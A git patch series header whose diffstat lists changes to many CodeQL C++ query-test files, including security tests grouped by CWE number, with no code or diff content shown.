From c732bd66136f8f9aa6d835f54be42bb90da79c0e Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Wed, 10 Jun 2026 12:31:19 +0000
Subject: [PATCH 01/15] Initial plan
From f54debd65aade2255e0a5638ba03123742ff5d2e Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:08 +0200 Subject: [PATCH 02/15] C++ --- .../examples/BadLocking/AV Rule 107.qlref | 3 +- .../LocalVariableHidesGlobalVariable.qlref | 3 +- .../BadLocking/UnintendedDeclaration.cpp | 6 +- .../test/examples/expressions/PrintAST.qlref | 2 +- .../NoCheckBeforeUnsafePutUser.qlref | 3 +- .../tests/LateCheckOfFunctionArgument.qlref | 3 +- .../Security/CWE/CWE-020/semmle/tests/test.c | 2 +- .../CWE/CWE-078/WordexpTainted.expected | 4 +- .../Security/CWE/CWE-078/WordexpTainted.qlref | 3 +- .../query-tests/Security/CWE/CWE-078/test.cpp | 4 +- .../semmle/tests/FindWrapperFunctions.qlref | 3 +- .../CWE/CWE-1041/semmle/tests/test.cpp | 2 +- ...OfVariableWithUnnecessarilyWideScope.qlref | 3 +- .../Security/CWE/CWE-1126/semmle/tests/test.c | 2 +- .../CustomCryptographicPrimitive.qlref | 3 +- .../Security/CWE/CWE-1240/tests_crypto.cpp | 8 +- ...usWorksWithMultibyteOrWideCharacters.qlref | 3 +- .../CWE/CWE-125/semmle/tests/test.cpp | 16 +- .../CWE/CWE-125/semmle/tests/test1.cpp | 14 +- .../CWE/CWE-125/semmle/tests/test2.cpp | 16 +- .../CWE/CWE-125/semmle/tests/test3.cpp | 6 +- .../AllocMultiplicationOverflow.expected | 20 +- .../AllocMultiplicationOverflow.qlref | 3 +- .../AllocMultiplicationOverflow/test.cpp | 20 +- ...ousUseOfTransformationAfterOperation.qlref | 3 +- .../test.cpp | 8 +- .../IfStatementAdditionOverflow.qlref | 3 +- .../IfStatementAdditionOverflow/test.cpp | 70 +++--- .../ArrayAccessProductFlow.expected | 38 ++-- .../array-access/ArrayAccessProductFlow.qlref | 3 +- .../CWE/CWE-193/array-access/test.cpp | 20 +- .../ConstantSizeArrayOffByOne.expected | 44 ++-- .../ConstantSizeArrayOffByOne.qlref | 3 +- .../CWE/CWE-193/constant-size/test.cpp | 58 ++--- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- .../Security/CWE/CWE-200/test1/test.cpp | 2 +- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- .../IncorrectChangingWorkingDirectory.qlref | 3 +- 
.../CWE/CWE-243/semmle/tests/test.cpp | 4 +- .../tests/IncorrectPrivilegeAssignment.qlref | 3 +- .../CWE/CWE-266/semmle/tests/test.cpp | 4 +- .../CWE/CWE-285/PamAuthorization.qlref | 3 +- .../query-tests/Security/CWE/CWE-285/test.cpp | 2 +- .../Security/CWE/CWE-295/CurlSSL.cpp | 4 +- .../Security/CWE/CWE-295/CurlSSL.qlref | 3 +- .../tests/PrivateCleartextWrite.expected | 24 +-- .../semmle/tests/PrivateCleartextWrite.qlref | 3 +- .../CWE/CWE-359/semmle/tests/test.cpp | 16 +- .../tests/DivideByZeroUsingReturnValue.qlref | 3 +- .../CWE/CWE-369/semmle/tests/test.cpp | 54 ++--- .../semmle/tests/InsecureTemporaryFile.qlref | 3 +- .../CWE/CWE-377/semmle/tests/test.cpp | 2 +- .../MemoryLeakOnFailedCallToRealloc.qlref | 3 +- .../Security/CWE/CWE-401/semmle/tests/test.c | 16 +- .../DecompressionBombs.expected | 28 +-- .../DecompressionBombs.qlref | 3 +- .../CWE-409/DecompressionBombs/brotliTest.cpp | 4 +- .../DecompressionBombs/libarchiveTests.cpp | 2 +- .../CWE/CWE-409/DecompressionBombs/main.cpp | 2 +- .../DecompressionBombs/minizipTest.cpp | 6 +- .../CWE-409/DecompressionBombs/zlibTest.cpp | 10 +- .../CWE-409/DecompressionBombs/zstdTest.cpp | 2 +- .../CWE/CWE-415/semmle/tests/DoubleFree.qlref | 3 +- .../Security/CWE/CWE-415/semmle/tests/test.c | 8 +- .../tests/DangerousUseOfExceptionBlocks.qlref | 3 +- .../CWE/CWE-476/semmle/tests/test.cpp | 12 +- .../tests/FindIncorrectlyUsedSwitch.qlref | 3 +- .../Security/CWE/CWE-561/semmle/tests/test.c | 8 +- .../tests/DangerousUseSSL_shutdown.qlref | 3 +- .../CWE/CWE-670/semmle/tests/test.cpp | 4 +- .../CWE-675/semmle/tests/DoubleRelease.qlref | 3 +- .../CWE/CWE-675/semmle/tests/test.cpp | 6 +- ...lowManagementAfterRefactoringTheCode.qlref | 3 +- ...FlowManagementWhenUsingBitOperations.qlref | 3 +- .../Security/CWE/CWE-691/semmle/tests/test.c | 12 +- .../tests/FindIncorrectlyUsedExceptions.qlref | 3 +- .../CWE/CWE-703/semmle/tests/test.cpp | 6 +- .../tests/ImproperCheckReturnValueScanf.qlref | 3 +- 
.../CWE/CWE-754/semmle/tests/test.cpp | 16 +- ...finedOrImplementationDefinedBehavior.qlref | 3 +- .../Security/CWE/CWE-758/semmle/tests/test.c | 4 +- ...rorWhenUseBitwiseOrLogicalOperations.qlref | 3 +- .../CWE/CWE-783/semmle/tests/test.cpp | 14 +- ...yLocationAfterEndOfBufferUsingStrlen.qlref | 3 +- ...rPrecedenceLogicErrorWhenUseBoolType.qlref | 3 +- .../Security/CWE/CWE-788/semmle/tests/test.c | 18 +- .../CWE/CWE-788/semmle/tests/test.cpp | 10 +- ...BufferAccessWithIncorrectLengthValue.qlref | 3 +- .../CWE/CWE-805/semmle/tests/test.cpp | 2 +- .../semmle/tests/MemoryUnsafeFunctionScan.cpp | 6 +- .../tests/MemoryUnsafeFunctionScan.qlref | 3 +- .../library-tests/c11_generic/PrintAST.qlref | 2 +- .../conversions/consistency.qlref | 2 +- .../extraction_errors/CompilerErrors.qlref | 2 +- .../extraction_errors/DatabaseQuality.qlref | 2 +- .../extraction_errors/ExtractionMetrics.qlref | 2 +- .../extraction_errors/SucceededIncludes.qlref | 2 +- .../ir/aliased_ssa_consistency_unsound.qlref | 2 +- .../aliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../library-tests/ir/ir/raw_consistency.qlref | 2 +- .../unaliased_ssa_consistency_unsound.qlref | 2 +- ...naliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../ssa/aliased_ssa_consistency_unsound.qlref | 2 +- .../ir/ssa/aliased_ssa_ir_unsound.qlref | 2 +- .../aliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../unaliased_ssa_consistency_unsound.qlref | 2 +- .../ir/ssa/unaliased_ssa_ir_unsound.qlref | 2 +- ...naliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../lossy_pointer_cast/lossy_pointer_cast.c | 4 +- .../lossy_pointer_cast.qlref | 3 +- .../subscript_operator/PrintAST.qlref | 2 +- .../syntax-zoo/aliased_ssa_consistency.qlref | 2 +- .../syntax-zoo/raw_consistency.qlref | 2 +- .../unaliased_ssa_consistency.qlref | 2 +- .../integral_types_ms/integral_type.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../FeatureEnvy/FeatureEnvy.qlref | 3 +- .../Architecture/FeatureEnvy/a.cpp | 6 +- 
.../InappropriateIntimacy.qlref | 2 +- .../ClassesWithManyFields/cwmf.cpp | 14 +- .../ClassesWithManyFields/cwmf.qlref | 3 +- .../ClassesWithManyFields/different_types.h | 2 +- .../ComplexFunctions/ComplexFunctions.qlref | 3 +- .../ComplexFunctions/complex.c | 2 +- .../GuardedFree/GuardedFree.qlref | 3 +- .../Best Practices/GuardedFree/test.cpp | 10 +- .../DeclarationHidesParameter.qlref | 3 +- .../DeclarationHidesParameter/hiding.cpp | 14 +- .../DeclarationHidesVariable.qlref | 3 +- .../DeclarationHidesVariable/hiding.cpp | 6 +- .../DeclarationHidesVariable.qlref | 3 +- .../LocalVariableHidesGlobalVariable/Hiding.c | 16 +- .../LocalVariableHidesGlobalVariable.qlref | 3 +- .../CommaBeforeMisleadingIndentation.qlref | 3 +- .../CommaBeforeMisleadingIndentation/test.cpp | 10 +- .../Likely Errors/EmptyBlock/EmptyBlock.qlref | 3 +- .../Likely Errors/EmptyBlock/empty_block.cpp | 6 +- .../OffsetUseBeforeRangeCheck.qlref | 3 +- .../OffsetUseBeforeRangeCheck/test.cpp | 12 +- .../Likely Errors/Slicing/Slicing.qlref | 3 +- .../Likely Errors/Slicing/test.cpp | 2 +- .../ConstructorOrMethodWithExactDate.cpp | 8 +- .../Japanese Era/JapaneseEraDate.qlref | 3 +- .../Japanese Era/StructWithExactDate.cpp | 6 +- .../MagicConstantsNumbers.qlref | 3 +- .../MagicConstantsNumbers/a123.c | 2 +- .../MagicConstantsNumbers/b123.c | 2 +- .../MagicConstantsNumbers/case.c | 2 +- .../MagicConstantsNumbers/constants.h | 10 +- .../MagicConstantsNumbers/functions.h | 4 +- .../MagicConstantsNumbers/templates.cpp | 4 +- .../MagicConstantsString.qlref | 3 +- .../MagicConstantsString/constants.h | 2 +- .../MagicConstantsString/joining.cpp | 6 +- .../Best Practices/RuleOfTwo/RuleOfTwo.cpp | 12 +- .../Best Practices/RuleOfTwo/RuleOfTwo.qlref | 3 +- .../SloppyGlobal/SloppyGlobal.qlref | 3 +- .../Best Practices/SloppyGlobal/main.cpp | 14 +- .../UnusedIncludes/unusedIncludes.cpp | 8 +- .../UnusedIncludes/unusedIncludes.qlref | 3 +- .../UnusedLocals/UnusedLocals.qlref | 3 +- .../Unused 
Entities/UnusedLocals/code.c | 16 +- .../Unused Entities/UnusedLocals/code.cpp | 12 +- .../Unused Entities/UnusedLocals/code2.cpp | 16 +- .../Unused Entities/UnusedLocals/errors.c | 2 +- .../UnusedStaticFunctions.qlref | 3 +- .../UnusedStaticFunctions/unused_functions.c | 8 +- .../UnusedStaticFunctions/unused_mut.c | 4 +- .../unused_static_functions.cpp | 6 +- .../UnusedStaticFunctions/used_by_var_ref.c | 6 +- .../UnusedStaticVariables.qlref | 3 +- .../UnusedStaticVariables/test.cpp | 8 +- .../DeadCodeFunction/DeadCodeFunction.qlref | 3 +- .../Critical/DeadCodeFunction/test.cpp | 2 +- .../Critical/DeadCodeGoto/DeadCodeGoto.qlref | 3 +- .../Critical/DeadCodeGoto/test.cpp | 6 +- .../FileClosed/FileMayNotBeClosed.qlref | 3 +- .../Critical/FileClosed/FileNeverClosed.qlref | 3 +- .../query-tests/Critical/FileClosed/file.c | 8 +- .../GlobalUseBeforeInit.qlref | 3 +- .../Critical/GlobalUseBeforeInit/test.cpp | 4 +- .../InitialisationNotRun.qlref | 3 +- .../Critical/InitialisationNotRun/test.cpp | 4 +- .../LargeParameter/LargeParameter.qlref | 3 +- .../Critical/LargeParameter/test.cpp | 20 +- .../Critical/MemoryFreed/DoubleFree.expected | 30 +-- .../Critical/MemoryFreed/DoubleFree.qlref | 3 +- .../MemoryFreed/MemoryMayNotBeFreed.qlref | 3 +- .../MemoryFreed/MemoryNeverFreed.qlref | 3 +- .../MemoryFreed/UseAfterFree.expected | 50 ++--- .../Critical/MemoryFreed/UseAfterFree.qlref | 3 +- .../Critical/MemoryFreed/my_auto_ptr.cpp | 12 +- .../query-tests/Critical/MemoryFreed/test.cpp | 26 +-- .../Critical/MemoryFreed/test_free.cpp | 124 +++++------ .../IncorrectCheckScanf.qlref | 3 +- .../MissingCheckScanf.expected | 44 ++-- .../MissingCheckScanf/MissingCheckScanf.qlref | 3 +- .../Critical/MissingCheckScanf/test.cpp | 96 ++++----- .../MissingNullTest/MissingNullTest.qlref | 3 +- .../Critical/MissingNullTest/test.cpp | 12 +- .../NewFree/NewArrayDeleteMismatch.qlref | 3 +- .../NewFree/NewDeleteArrayMismatch.qlref | 3 +- .../Critical/NewFree/NewFreeMismatch.qlref | 3 +- 
.../query-tests/Critical/NewFree/test.cpp | 54 ++--- .../query-tests/Critical/NewFree/test2.cpp | 12 +- .../NotInitialised/NotInitialised.qlref | 3 +- .../Critical/NotInitialised/test.cpp | 4 +- .../NoSpaceForZeroTerminator.qlref | 3 +- .../OverflowCalculated.qlref | 3 +- .../Critical/OverflowCalculated/tests1.cpp | 12 +- .../Critical/OverflowCalculated/tests2.cpp | 4 +- .../Critical/OverflowCalculated/tests3.cpp | 10 +- .../OverflowStatic/OverflowStatic.qlref | 3 +- .../Critical/OverflowStatic/test.c | 8 +- .../Critical/OverflowStatic/test.cpp | 10 +- .../Critical/OverflowStatic/test2.c | 14 +- .../ReturnValueIgnored.qlref | 3 +- .../Critical/ReturnValueIgnored/test.cpp | 2 +- .../Critical/SizeCheck/SizeCheck2.qlref | 3 +- .../query-tests/Critical/SizeCheck/test2.c | 10 +- .../UnsafeUseOfThis/UnsafeUseOfThis.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionErrors.qlref | 2 +- .../Diagnostics/ExtractionWarnings.qlref | 2 +- .../FailedExtractorInvocations.qlref | 2 +- .../CommentedOutCode/CommentedOutCode.qlref | 3 +- .../Documentation/CommentedOutCode/test.c | 10 +- .../Documentation/CommentedOutCode/test2.cpp | 30 +-- .../DocumentApi/DocumentApi.qlref | 3 +- .../DocumentApi/comment_prototypes.c | 12 +- .../Documentation/DocumentApi/definition.c | 4 +- .../TodoComments/FixmeComments.qlref | 3 +- .../TodoComments/TodoComments.qlref | 3 +- .../Documentation/TodoComments/todo.c | 14 +- .../Documentation/TodoComments/todo_fixme.cpp | 12 +- .../Cleanup-DuplicateIncludeGuard.qlref | 3 +- .../Cleanup-DuplicateIncludeGuard/header1.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header2.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header4.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header6.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header7.h | 2 +- .../subfolder/header4.h | 2 +- .../subfolder/header5.h | 2 +- .../LimitedScopeFile/LimitedScopeFile.qlref | 3 +- .../LOC-3/Rule 13/LimitedScopeFile/file1.c | 2 +- .../LimitedScopeFunction.qlref | 3 +- 
.../LOC-3/Rule 13/LimitedScopeFunction/test.c | 6 +- .../JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref | 3 +- .../query-tests/JPL_C/LOC-3/Rule 17/test.c | 2 +- .../NonConstFunctionPointer.qlref | 3 +- .../Rule 29/NonConstFunctionPointer/test.c | 6 +- .../FunctionPointerConversions.qlref | 3 +- .../Rule 30/FunctionPointerConversions/test.c | 12 +- .../AmbiguouslySignedBitField.qlref | 3 +- .../AmbiguouslySignedBitField/test.cpp | 10 +- .../BadAdditionOverflowCheck.qlref | 3 +- .../ComparisonWithCancelingSubExpr.qlref | 3 +- .../PointlessSelfComparison.qlref | 3 +- .../SignedOverflowCheck.cpp | 14 +- .../SignedOverflowCheck.qlref | 3 +- .../BadAdditionOverflowCheck/templates.cpp | 2 +- .../BadAdditionOverflowCheck/test.cpp | 20 +- .../Arithmetic/BadCheckOdd/BadCheckOdd.qlref | 3 +- .../Arithmetic/BadCheckOdd/test.cpp | 4 +- .../BitwiseSignCheck/BitwiseSignCheck.qlref | 3 +- .../Arithmetic/BitwiseSignCheck/bsc.cpp | 8 +- .../ComparisonPrecedence.qlref | 3 +- .../ComparisonPrecedence/template.cpp | 2 +- .../Arithmetic/ComparisonPrecedence/test.cpp | 16 +- .../FloatComparison/FloatComparison.qlref | 3 +- .../Arithmetic/FloatComparison/c.c | 8 +- .../Arithmetic/IntMultToLong/Buildless.c | 4 +- .../Arithmetic/IntMultToLong/IntMultToLong.c | 28 +-- .../IntMultToLong/IntMultToLong.cpp | 2 +- .../IntMultToLong/IntMultToLong.qlref | 3 +- .../PointlessComparison/ConstVirtual.cpp | 2 +- .../PointlessComparison/PointlessComparison.c | 96 ++++----- .../PointlessComparison.cpp | 10 +- .../PointlessComparison.qlref | 3 +- .../PointlessComparison/RegressionTests.cpp | 2 +- .../PointlessComparison/Templates.cpp | 2 +- .../PointlessComparison/UnsignedGEZero.qlref | 3 +- .../Arithmetic/UnsignedGEZero/Templates.cpp | 2 +- .../UnsignedGEZero/UnsignedGEZero.c | 44 ++-- .../UnsignedGEZero/UnsignedGEZero.cpp | 44 ++-- .../UnsignedGEZero/UnsignedGEZero.qlref | 3 +- .../ContinueInFalseLoop.qlref | 3 +- .../Likely Bugs/ContinueInFalseLoop/test.cpp | 4 +- .../ArrayArgSizeMismatch.qlref | 3 +- 
.../Conversion/ArrayArgSizeMismatch/test.cpp | 2 +- .../CastArrayPointerArithmetic.expected | 20 +- .../CastArrayPointerArithmetic.qlref | 3 +- .../CastArrayPointerArithmetic/test.cpp | 24 +-- .../ImplicitDowncastFromBitfield.qlref | 3 +- .../ImplicitDowncastFromBitfield/test.cpp | 4 +- .../LossyFunctionResultCast.qlref | 3 +- .../LossyFunctionResultCast/test.cpp | 18 +- .../NonConstantFormat/NonConstantFormat.c | 8 +- .../NonConstantFormat.expected | 40 ++-- .../NonConstantFormat/NonConstantFormat.qlref | 3 +- .../Format/NonConstantFormat/nested.cpp | 10 +- .../Format/NonConstantFormat/test.cpp | 48 ++--- .../SnprintfOverflow/SnprintfOverflow.qlref | 3 +- .../Format/SnprintfOverflow/test.cpp | 8 +- .../TooManyFormatArguments.qlref | 3 +- .../WrongNumberOfFormatArguments.qlref | 3 +- .../Format/WrongNumberOfFormatArguments/a.c | 4 +- .../Format/WrongNumberOfFormatArguments/b.c | 4 +- .../Format/WrongNumberOfFormatArguments/c.c | 4 +- .../custom_printf.cpp | 4 +- .../WrongNumberOfFormatArguments/macros.cpp | 10 +- .../syntax_errors.c | 2 +- .../WrongNumberOfFormatArguments/test.c | 28 +-- .../Buildless/WrongTypeFormatArguments.qlref | 3 +- .../Buildless/second.cpp | 4 +- .../Buildless/tests.c | 2 +- .../Builtin/WrongTypeFormatArguments.qlref | 3 +- .../WrongTypeFormatArguments/Builtin/tests.c | 2 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_mixed_byte_wprintf/tests.cpp | 22 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_mixed_word_size/tests_32.cpp | 4 +- .../Linux_mixed_word_size/tests_64.cpp | 4 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_signed_chars/format.h | 2 +- .../Linux_signed_chars/linux.cpp | 2 +- .../Linux_signed_chars/linux_c.c | 2 +- .../Linux_signed_chars/pri_macros.h | 2 +- .../Linux_signed_chars/printf1.h | 102 ++++----- .../Linux_signed_chars/real_world.h | 8 +- .../Linux_signed_chars/wide_string.h | 2 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_two_byte_wprintf/printf.cpp | 4 +- 
.../WrongTypeFormatArguments.qlref | 3 +- .../Linux_unsigned_chars/format.h | 2 +- .../Linux_unsigned_chars/pri_macros.h | 2 +- .../Linux_unsigned_chars/printf1.h | 22 +- .../Linux_unsigned_chars/real_world.h | 8 +- .../Linux_unsigned_chars/wide_string.h | 2 +- .../Microsoft/WrongTypeFormatArguments.qlref | 3 +- .../Microsoft/format.h | 2 +- .../Microsoft/pri_macros.h | 2 +- .../Microsoft/printf1.h | 58 ++--- .../Microsoft/real_world.h | 8 +- .../Microsoft/wide_string.h | 4 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Microsoft_no_wchar/format.h | 2 +- .../Microsoft_no_wchar/pri_macros.h | 2 +- .../Microsoft_no_wchar/printf1.h | 54 ++--- .../Microsoft_no_wchar/real_world.h | 8 +- .../Microsoft_no_wchar/wide_string.h | 4 +- .../InconsistentCheckReturnNull.qlref | 3 +- .../InconsistentCheckReturnNull/test.c | 2 +- .../Adding365daysPerYear.qlref | 3 +- .../Leap Year/Adding365DaysPerYear/test.cpp | 10 +- ...UncheckedReturnValueForTimeFunctions.qlref | 2 +- .../UnsafeArrayForDaysOfYear.qlref | 3 +- .../UnsafeArrayForDaysOfYear/test.cpp | 6 +- .../AssignWhereCompareMeant.qlref | 3 +- .../AssignWhereCompareMeant/test.cpp | 48 ++--- .../CompareWhereAssignMeant.qlref | 3 +- .../ExprHasNoEffect.qlref | 3 +- .../CompareWhereAssignMeant/test.cpp | 20 +- .../DubiousNullCheck/DubiousNullCheck.cpp | 8 +- .../DubiousNullCheck/DubiousNullCheck.qlref | 3 +- .../TryCompile-abcdef/ExprHasNoEffect.qlref | 3 +- .../ExprHasNoEffect/ExprHasNoEffect.qlref | 3 +- .../autoconf/ExprHasNoEffect.qlref | 3 +- .../ExprHasNoEffect/autoconf/conftest.c.c | 2 +- .../ExprHasNoEffect/autoconf/conftest_abc.c | 2 +- .../Likely Typos/ExprHasNoEffect/calls.cpp | 4 +- .../Likely Typos/ExprHasNoEffect/expr.cpp | 6 +- .../tmp_abc/ExprHasNoEffect.qlref | 3 +- .../Likely Typos/ExprHasNoEffect/preproc.c | 4 +- .../Likely Typos/ExprHasNoEffect/template.cpp | 2 +- .../ExprHasNoEffect/templatey.cpp | 2 +- .../Likely Typos/ExprHasNoEffect/test.c | 26 +-- .../Likely Typos/ExprHasNoEffect/test.cpp | 4 +- 
.../Likely Typos/ExprHasNoEffect/volatile.c | 8 +- .../Likely Typos/ExprHasNoEffect/weak.c | 2 +- .../IncorrectNotOperatorUsage.c | 16 +- .../IncorrectNotOperatorUsage.cpp | 18 +- .../IncorrectNotOperatorUsage.qlref | 3 +- .../ShortCircuitBitMask.qlref | 3 +- .../ShortCircuitBitMask/big_ints.cpp | 24 +-- .../UsingStrcpyAsBoolean.qlref | 3 +- .../Likely Typos/UsingStrcpyAsBoolean/test.c | 22 +- .../UsingStrcpyAsBoolean/test.cpp | 40 ++-- .../inconsistentLoopDirection.c | 12 +- .../inconsistentLoopDirection.cpp | 38 ++-- .../inconsistentLoopDirection.qlref | 3 +- .../AllocaInLoop/AllocaInLoop.qlref | 3 +- .../AllocaInLoop/AllocaInLoop1.cpp | 8 +- .../AllocaInLoop/AllocaInLoop1ms.cpp | 6 +- .../AllocaInLoop/AllocaInLoop2.c | 2 +- .../AllocaInLoop/AllocaInLoop3.cpp | 2 +- .../AllocaInLoop/BoundedLoop.cpp | 18 +- .../ImproperNullTermination.qlref | 3 +- .../ImproperNullTerminationTainted.qlref | 3 +- .../ImproperNullTermination/test.cpp | 56 ++--- .../NtohlArrayNoBound/NtohlArrayNoBound.qlref | 3 +- .../NtohlArrayNoBound/test.cpp | 18 +- .../More64BitWaste/More64BitWaste.qlref | 3 +- .../Padding/More64BitWaste/test.cpp | 4 +- .../NonPortablePrintf/NonPortablePrintf.qlref | 3 +- .../Padding/NonPortablePrintf/test.cpp | 8 +- .../Suboptimal64BitType.qlref | 3 +- .../Padding/Suboptimal64BitType/types.c | 2 +- .../PointerOverflow/PointerOverflow.qlref | 3 +- .../PointerOverflow/test.cpp | 8 +- .../ReturnCstrOfLocalStdString.qlref | 3 +- .../ReturnCstrOfLocalStdString/test.cpp | 6 +- .../ReturnStackAllocatedMemory.expected | 34 +-- .../ReturnStackAllocatedMemory.qlref | 3 +- .../ReturnStackAllocatedMemory/test.cpp | 52 ++--- .../StackAddressEscapes.qlref | 3 +- .../StackAddressEscapes/manager.cpp | 2 +- .../StackAddressEscapes/test.cpp | 130 +++++------ .../StrncpyFlippedArgs.qlref | 3 +- .../StrncpyFlippedArgs/test.c | 4 +- .../StrncpyFlippedArgs/test.cpp | 40 ++-- .../SuspiciousCallToMemset.qlref | 3 +- .../SuspiciousCallToMemset/doc_tests.c | 2 +- 
.../SuspiciousCallToMemset/test.cpp | 60 +++--- .../SuspiciousCallToStrncat.qlref | 3 +- .../SuspiciousCallToStrncat/test.c | 14 +- .../SuspiciousSizeof/SuspiciousSizeof.qlref | 3 +- .../SuspiciousSizeof/test.cpp | 12 +- .../UnsafeUseOfStrcat/strcat.c | 4 +- .../UnsafeUseOfStrcat/strcat.qlref | 3 +- .../UsingExpiredStackAddress.expected | 56 ++--- .../UsingExpiredStackAddress.qlref | 3 +- .../UsingExpiredStackAddress/test.cpp | 108 +++++----- .../IncorrectConstructorDelegation.qlref | 3 +- .../IncorrectConstructorDelegation/test.cpp | 4 +- .../NonVirtualDestructorInBaseClass.cpp | 6 +- .../NonVirtualDestructorInBaseClass.qlref | 3 +- .../ThrowInDestructor/ThrowInDestructor.qlref | 3 +- .../Likely Bugs/OO/ThrowInDestructor/test.cpp | 6 +- .../TlsSettingsMisconfiguration.qlref | 3 +- .../UseOfDeprecatedHardcodedProtocol.qlref | 3 +- .../Likely Bugs/Protocols/test.cpp | 34 +-- .../Likely Bugs/Protocols/test2.cpp | 10 +- .../Likely Bugs/Protocols/test3.cpp | 2 +- .../RedundantNullCheckSimple.cpp | 24 +-- .../RedundantNullCheckSimple.expected | 36 ++-- .../RedundantNullCheckSimple.qlref | 3 +- .../ReturnConstType/ReturnConstType.qlref | 3 +- .../Likely Bugs/ReturnConstType/test.cpp | 14 +- .../ReturnConstTypeMember.qlref | 3 +- .../ReturnConstTypeMember/templates.cpp | 2 +- .../ReturnConstTypeMember/test.cpp | 6 +- .../ShortLoopVarName/ShortLoopVarName.cpp | 8 +- .../ShortLoopVarName/ShortLoopVarName.qlref | 3 +- .../ImplicitFunctionDeclaration.qlref | 3 +- .../MistypedFunctionArguments.qlref | 3 +- .../TooFewArguments.qlref | 3 +- .../TooManyArguments.qlref | 3 +- .../Underspecified Functions/test.c | 50 ++--- .../UseInOwnInitializer.qlref | 3 +- .../Likely Bugs/UseInOwnInitializer/test.cpp | 8 +- .../Metrics/Functions/FunLinesOfCode.qlref | 2 +- .../Functions/FunLinesOfComments.qlref | 2 +- .../Metrics/Functions/FunNumberOfCalls.qlref | 2 +- .../Functions/FunNumberOfParameters.qlref | 2 +- .../Functions/FunNumberOfStatements.qlref | 2 +- .../Rule 
2/BoundedLoopIterations.qlref | 3 +- .../query-tests/Power of 10/Rule 2/loops.cpp | 26 +-- .../CWE/CWE-014/MemsetMayBeDeleted.qlref | 3 +- .../query-tests/Security/CWE/CWE-014/test.cpp | 6 +- ..._Path_Traversal__char_console_fopen_11.cpp | 4 +- .../SAMATE/TaintedPath/TaintedPath.expected | 4 +- .../SAMATE/TaintedPath/TaintedPath.qlref | 3 +- .../SAMATE/ExecTainted/ExecTainted.expected | 4 +- .../SAMATE/ExecTainted/ExecTainted.qlref | 3 +- .../CWE/CWE-078/SAMATE/ExecTainted/tests.cpp | 4 +- .../semmle/ExecTainted/ExecTainted.expected | 50 ++--- .../semmle/ExecTainted/ExecTainted.qlref | 3 +- .../CWE/CWE-078/semmle/ExecTainted/test.cpp | 66 +++--- .../CWE/CWE-079/semmle/CgiXss/CgiXss.expected | 8 +- .../CWE/CWE-079/semmle/CgiXss/CgiXss.qlref | 3 +- .../CWE/CWE-079/semmle/CgiXss/search.c | 8 +- .../UncontrolledProcessOperation.expected | 4 +- .../UncontrolledProcessOperation.qlref | 3 +- .../UncontrolledProcessOperation/test.cpp | 4 +- .../UncontrolledProcessOperation.expected | 22 +- .../UncontrolledProcessOperation.qlref | 3 +- .../UncontrolledProcessOperation/test.cpp | 34 +-- .../CWE-119/SAMATE/BadlyBoundedWrite.qlref | 3 +- .../SAMATE/OffsetUseBeforeRangeCheck.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverflowBuffer.qlref | 3 +- .../SAMATE/OverflowDestination.expected | 2 +- .../CWE-119/SAMATE/OverflowDestination.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverflowStatic.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverrunWrite.qlref | 3 +- .../CWE-119/SAMATE/OverrunWriteFloat.qlref | 3 +- .../SAMATE/OverrunWriteProductFlow.expected | 32 +-- .../SAMATE/OverrunWriteProductFlow.qlref | 3 +- .../CWE-119/SAMATE/StrncpyFlippedArgs.qlref | 3 +- .../CWE-119/SAMATE/UnboundedWrite.expected | 2 +- .../CWE/CWE-119/SAMATE/UnboundedWrite.qlref | 3 +- .../SAMATE/VeryLikelyOverrunWrite.qlref | 3 +- .../Security/CWE/CWE-119/SAMATE/test.cpp | 40 ++-- .../Security/CWE/CWE-119/SAMATE/tests.cpp | 34 +-- .../semmle/tests/BadlyBoundedWrite.qlref | 3 +- .../tests/OffsetUseBeforeRangeCheck.qlref | 3 +- 
.../CWE-119/semmle/tests/OverflowBuffer.qlref | 3 +- .../semmle/tests/OverflowDestination.expected | 10 +- .../semmle/tests/OverflowDestination.qlref | 3 +- .../CWE-119/semmle/tests/OverflowStatic.qlref | 3 +- .../CWE-119/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/StrncpyFlippedArgs.qlref | 3 +- .../semmle/tests/UnboundedWrite.expected | 6 +- .../CWE-119/semmle/tests/UnboundedWrite.qlref | 3 +- .../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- .../CWE/CWE-119/semmle/tests/main.cpp | 2 +- .../semmle/tests/overflowdestination.cpp | 12 +- .../CWE/CWE-119/semmle/tests/tests.cpp | 202 +++++++++--------- .../CWE/CWE-119/semmle/tests/tests_restrict.c | 2 +- .../CWE/CWE-119/semmle/tests/unions.cpp | 6 +- .../CWE-119/semmle/tests/var_size_struct.cpp | 10 +- .../UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref | 3 +- .../CWE-120/semmle/UnsafeUseOfStrcat/test.c | 4 +- .../semmle/tests/BadlyBoundedWrite.qlref | 3 +- .../CWE-120/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/UnboundedWrite.expected | 12 +- .../CWE-120/semmle/tests/UnboundedWrite.qlref | 3 +- 